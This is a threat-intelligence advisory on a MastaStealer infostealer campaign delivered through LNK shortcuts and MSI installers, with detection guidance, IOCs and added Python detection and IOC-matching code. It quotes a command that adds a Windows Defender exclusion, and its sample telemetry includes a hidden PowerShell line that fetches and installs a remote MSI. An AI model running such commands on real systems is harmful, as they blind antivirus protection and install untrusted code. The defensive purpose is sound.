Malicious LNK Campaign Deploys MastaStealer via MSI-Based Payloads
November 18th, 2025
High

Our Cyber Threat Intelligence Unit has identified a newly observed malware campaign that uses Windows shortcut (.lnk) files as the initial access vector to deploy MastaStealer, a sophisticated infostealer. The campaign targets Windows systems via spear-phishing emails that deliver ZIP archives containing a single crafted .lnk file. Once executed, the shortcut launches Microsoft Edge to display the legitimate AnyDesk website as a decoy, while silently downloading and installing an MSI-based payload from an AnyDesk-themed compromised domain (e.g., anydesck[.]net). The MSI installer deploys a command-and-control (C2) beacon masquerading as a legitimate Windows binary and uses PowerShell to add a Windows Defender exclusion for the malware’s path. Because this chain relies on native Windows features (LNK launch, MSI installer, Defender exclusion modification), it can evade default protections and allow persistent attacker access, posing a serious risk for organizations with Windows-based endpoints.
Technical Details
Attack Type: Infostealer deployment via malicious LNK files.
Severity: High.
Delivery Method: Spear-phishing emails delivering ZIP archives containing a single .lnk shortcut that executes hidden PowerShell commands to fetch and run an MSI-based payload.
Affected Components: Windows endpoints, especially Windows 10/11 systems, where users execute .lnk files from email attachments.
Attack Chain:
Victims receive spear-phishing emails containing ZIP attachments with a single malicious .lnk file masquerading as a legitimate document or tool.
When clicked, the LNK launches Microsoft Edge and opens the AnyDesk website (anydesk[.]com) in the foreground as a decoy, while a hidden PowerShell command executes in the background.
The PowerShell command downloads and runs an MSI installer from AnyDesk-spoofed or compromised domains such as anydesck[.]net / anydesk[.]net.
The MSI creates a temporary folder, %LOCALAPPDATA%\Temp\MW-<UUID>, extracts the embedded files.cab there, and drops a binary named dwm.exe into %LOCALAPPDATA%\Microsoft\Windows.
This executable functions as the MastaStealer C2 beacon.
During installation, the malware runs a PowerShell command such as: Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Local\Microsoft\Windows\dvm.exe".
This adds a Windows Defender exclusion for the malware's path, effectively blinding Defender's real-time scanning to it and allowing the beacon to operate undetected.
Once active, the beacon communicates with remote C2 infrastructure and exfiltrates stolen data, including credentials, browser cookies, and session tokens.

Impact
Theft of sensitive system information, credentials, cookies, and browser-stored data, allowing for account takeover and further compromise.
Potential compromise of accounts linked to saved passwords, tokens, or persistent browser sessions.
Loss of endpoint integrity due to stealthy installation under legitimate-looking Windows paths (%LOCALAPPDATA%\Microsoft\Windows\dwm.exe).
Reduced security monitoring effectiveness because the malware adds a Windows Defender exclusion for its path.
Potential lateral movement if harvested credentials grant access to internal systems or privileged accounts.
Increased risk of subsequent malware deployment via the attacker’s persistent foothold and C2 beacon.
Detection Method
Monitor execution of .lnk files, especially those launched from email attachment paths or temp directories, that spawn PowerShell or other unexpected child processes.
Correlate Windows Installer logs (Application Event ID 11708) with recent LNK/PowerShell activity to detect failed or suspicious MSI deployments associated with this campaign.
Detect MSI installations initiated from non-corporate, newly registered, or suspicious remote domains, including AnyDesk-themed compromised domains.
Hunt for new Windows Defender exclusion entries referencing %LOCALAPPDATA%\Microsoft\Windows or similarly unusual user-profile paths, especially those added via PowerShell Add-MpPreference.
Inspect process trees for dwm.exe running from user directories (e.g., %LOCALAPPDATA%\Microsoft\Windows) instead of C:\Windows\System32\.
Analyze network logs for connections to the known MastaStealer C2 domains and IPs listed in the IOC section, as well as unusual outbound traffic to newly observed AnyDesk-themed or random-looking domains.
During incident response, note whether an AnyDesk page in Edge appeared unexpectedly at the same time as suspicious script or MSI activity, as this decoy behavior is characteristic of the campaign.
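The detection points above translate directly into rules over process-creation telemetry. The following is an added example, not code from the advisory or its authors: it runs four such rules over constructed records. The record shape (pid, parent_image, image, cmdline) is an assumption standing in for whatever an EDR or Sysmon Event ID 1 export provides, and the sample paths and command lines are constructed to mirror the chain described above (hidden PowerShell launched from explorer.exe, msiexec pointed at a remote package, Add-MpPreference exclusions, and dwm.exe running outside System32). The exclusion rule also covers Add-MpPreference's -ExclusionProcess and -ExclusionExtension parameters, which go beyond the -ExclusionPath case the advisory quotes.

```python
"""Added example (not from the advisory): detection rules for the behaviours
in the Detection Method section, run over constructed process telemetry."""
import re
from typing import Dict, List

SYSTEM32 = r"c:\windows\system32"

# Add-MpPreference with any of its exclusion parameters; the value may be
# double-quoted, single-quoted or bare.
EXCLUSION_RE = re.compile(
    r"add-mppreference\b.*?-exclusion(?:path|process|extension)\s+"
    r"(?:\"([^\"]+)\"|'([^']+)'|(\S+))",
    re.IGNORECASE,
)
# PowerShell asked to run without a visible window (-WindowStyle Hidden / -w hidden).
HIDDEN_PS_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
# msiexec handed a package URL instead of a local file.
REMOTE_MSI_RE = re.compile(r"msiexec(?:\.exe)?\b.*?\bhttps?://", re.IGNORECASE)

# Constructed sample telemetry: one benign dwm.exe, one benign exclusion
# change, and three events shaped like the campaign's chain.
SAMPLE_EVENTS = [
    {"pid": 4100, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\dwm.exe", "cmdline": "dwm.exe"},
    {"pid": 4200, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -Command \"Start-Process "
                "msiexec.exe -ArgumentList '/i https://msi-host.example/setup.msi /qn'\""},
    {"pid": 4300, "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe Add-MpPreference -ExclusionPath '
                r'"C:\Users\admin\AppData\Local\Microsoft\Windows\dwm.exe"'},
    {"pid": 4400, "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Users\admin\AppData\Local\Microsoft\Windows\dwm.exe",
     "cmdline": "dwm.exe"},
    {"pid": 4500, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Vendor\app.exe"'},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def under_system32(path: str) -> bool:
    return path.replace("/", "\\").lower().startswith(SYSTEM32 + "\\")


def in_user_profile(path: str) -> bool:
    """True for paths under a user profile, expanded or via %LOCALAPPDATA%/%APPDATA%."""
    p = path.replace("/", "\\").lower()
    return ("\\users\\" in p or "\\appdata\\" in p
            or "%localappdata%" in p or "%appdata%" in p)


def evaluate(event: Dict) -> List[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits: List[str] = []
    image = event.get("image", "")
    parent = event.get("parent_image", "")
    cmd = event.get("cmdline", "")
    # Rule 1: a process named like the Desktop Window Manager outside System32.
    if basename(image) == "dwm.exe" and not under_system32(image):
        hits.append("dwm_masquerade_outside_system32")
    # Rule 2: hidden PowerShell spawned by the shell, as a double-clicked LNK would do.
    if (basename(parent) == "explorer.exe"
            and basename(image) in ("powershell.exe", "pwsh.exe")
            and HIDDEN_PS_RE.search(cmd)):
        hits.append("hidden_powershell_from_explorer")
    # Rule 3: any Defender exclusion change; escalate when the path is in a user profile.
    m = EXCLUSION_RE.search(cmd)
    if m:
        hits.append("defender_exclusion_added")
        excluded = m.group(1) or m.group(2) or m.group(3) or ""
        if in_user_profile(excluded):
            hits.append("defender_exclusion_user_profile_path")
    # Rule 4: Windows Installer fetching its package from a remote URL.
    if REMOTE_MSI_RE.search(cmd):
        hits.append("msiexec_remote_package")
    return hits


def scan(events) -> Dict[int, List[str]]:
    """Map pid -> matched rules for every event that matched at least one rule."""
    findings: Dict[int, List[str]] = {}
    for e in events:
        hits = evaluate(e)
        if hits:
            findings[e["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

Rule 3 fires on every exclusion change so that the benign event (pid 4500) is still logged for review, while the user-profile variant (pid 4300) carries the stronger name an alerting pipeline would page on; in production the same rules would be fed by the exported telemetry rather than the constructed list.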
Indicators of Compromise
Type        | Indicator
------------|------------------------
Domain Name | cmqsqomiwwksmcsw[.]xyz
IP Address  | 38[.]134[.]148[.]74
Domain Name | ykgmqooyusggyyya[.]xyz
IP Address  | 155[.]117[.]20[.]75
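To put the table to use, the indicators have to be refanged and matched against network logs. The following is an added example, not code from the advisory or its authors: it refangs the published IOCs, scans constructed DNS, proxy and firewall log lines for them, and also flags AnyDesk-lookalike hostnames along the lines of the anydesck[.]net / anydesk[.]net examples given earlier. The log line format is an assumption; the matcher only relies on hostnames and IPv4 addresses appearing as delimited tokens, so it works on most line-oriented formats.

```python
"""Added example (not from the advisory): IOC and lookalike-domain matching
over constructed network log lines."""
import ipaddress
import re
from typing import Dict, List, Tuple

# IOCs exactly as published in the table above (defanged).
IOCS_DEFANGED = {
    "cmqsqomiwwksmcsw[.]xyz": "domain",
    "38[.]134[.]148[.]74": "ip",
    "ykgmqooyusggyyya[.]xyz": "domain",
    "155[.]117[.]20[.]75": "ip",
}


def refang(value: str) -> str:
    """Turn the published defanged form back into a matchable string."""
    return value.replace("[.]", ".")


IOC_SET = {refang(k): kind for k, kind in IOCS_DEFANGED.items()}

HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
ANYDESK_LEGIT = "anydesk.com"

# Constructed sample log lines: a legitimate AnyDesk lookup, a download from an
# AnyDesk-themed host, a C2 domain lookup and its answer, a connection to the
# C2 address, and an unrelated lookup.
SAMPLE_LOGS = [
    "2025-11-18T09:58:02Z dns client=10.0.4.12 query=anydesk.com type=A rcode=NOERROR",
    "2025-11-18T09:58:05Z proxy client=10.0.4.12 method=GET url=https://anydesck.net/setup.msi status=200",
    "2025-11-18T09:59:41Z dns client=10.0.4.12 query=cmqsqomiwwksmcsw.xyz type=A answer=38.134.148.74",
    "2025-11-18T09:59:42Z fw client=10.0.4.12 dst=38.134.148.74 dport=443 action=allow",
    "2025-11-18T10:01:07Z dns client=10.0.4.30 query=update.vendor.example type=A rcode=NOERROR",
]


def anydesk_lookalike(host: str) -> bool:
    """Heuristic: an AnyDesk-themed hostname that is not the vendor's own domain
    or one of its subdomains."""
    h = host.lower()
    if h == ANYDESK_LEGIT or h.endswith("." + ANYDESK_LEGIT):
        return False
    return "anydes" in h


def scan_line(line: str) -> Dict[str, List[str]]:
    """Return the IOC domains, IOC IPs and lookalike hosts found in one line."""
    hits: Dict[str, List[str]] = {"ioc_domain": [], "ioc_ip": [], "anydesk_lookalike": []}
    for host in {h.lower() for h in HOST_RE.findall(line)}:
        if IOC_SET.get(host) == "domain":
            hits["ioc_domain"].append(host)
        elif anydesk_lookalike(host):
            hits["anydesk_lookalike"].append(host)
    for ip in set(IPV4_RE.findall(line)):
        try:
            ipaddress.ip_address(ip)  # discards 999.1.1.1-style false matches
        except ValueError:
            continue
        if IOC_SET.get(ip) == "ip":
            hits["ioc_ip"].append(ip)
    return {k: sorted(v) for k, v in hits.items() if v}


def scan_logs(lines) -> List[Tuple[int, Dict[str, List[str]]]]:
    """Pair each matching line's index with what was found in it."""
    results = []
    for i, line in enumerate(lines):
        found = scan_line(line)
        if found:
            results.append((i, found))
    return results


if __name__ == "__main__":
    for idx, found in scan_logs(SAMPLE_LOGS):
        print(idx, found)
```

Keeping the IOCs in their defanged form and refanging at load time means the list can be pasted from the advisory unchanged; the lookalike heuristic is deliberately broad and is meant to surface hosts for review, not to block on its own.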

Recommendations
Block or restrict execution of .lnk files originating from email attachments, downloads, or untrusted network shares.
Enforce application allowlisting to ensure only trusted applications and signed installers can execute.
Enable and centralize advanced logging for PowerShell and Windows Installer to capture Add-MpPreference usage and MSI failures (Event ID 11708).
Monitor and alert on PowerShell commands that modify Defender preferences, especially those involving exclusion paths under %LOCALAPPDATA%\Microsoft\Windows or other non-standard directories.
Validate the legitimacy and file path of processes named like system binaries (e.g., dwm.exe) and investigate any instances running from user-profile locations instead of System32.
Implement robust email security controls (sandboxing, ZIP content inspection) to detect and block malicious LNK-laden attachments at the perimeter.
Proactively block or closely monitor access to the identified C2 infrastructure and AnyDesk-themed compromised domains involved in this campaign.
Conclusion
The MastaStealer campaign demonstrates a sophisticated abuse of native Windows features such as LNK shortcuts, MSI installers, and Defender exclusions to bypass traditional security measures and quietly establish a persistent C2 beacon. We urge organizations to prioritize controls that monitor LNK-based execution, detect suspicious MSI deployments, and flag unauthorized security exclusions. Regularly updating security protocols, hardening endpoint configurations, and maintaining vigilant monitoring of script-based and installer activity are essential to mitigate the risks associated with this and similar Windows-focused infostealer campaigns.